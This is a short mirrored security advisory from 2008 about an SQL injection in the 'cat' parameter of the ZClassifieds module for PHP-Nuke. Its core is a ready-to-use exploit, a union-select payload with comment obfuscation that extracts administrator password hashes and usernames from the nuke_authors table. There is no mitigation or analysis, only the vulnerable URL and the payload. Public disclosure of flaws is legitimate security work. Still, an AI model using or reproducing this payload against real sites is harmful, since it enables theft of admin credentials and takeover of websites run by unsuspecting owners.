Computer Security

Security Advisory: PHP-Nuke Module ZClassifieds [cat] SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Directory traversal in EdiorCMS V3.0

  XSS in PHP-Nuke (eWeather module)

  Powered by phpBB 2001, 2006 (SQL)

  travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

From:lovebug_(at)_hotmail.it <lovebug_(at)_hotmail.it>
Date:13.03.2008
Subject:PHP-Nuke Module ZClassifieds [cat] SQL Injection


----- RBT-4 crew [ Lovebug ] Italy --------

Author : Lovebug


Script : PHP-Nuke Module ZClassifieds [cat] SQL Injection

Bug :  modules.php?name=ZClassifieds&cat= [S Q L]

Exploit :

-9999999/**/union/**/select/**/pwd,
aid/**/from/**/nuke_authors/*where%20admin1/**

Original Advisory: http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3109
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru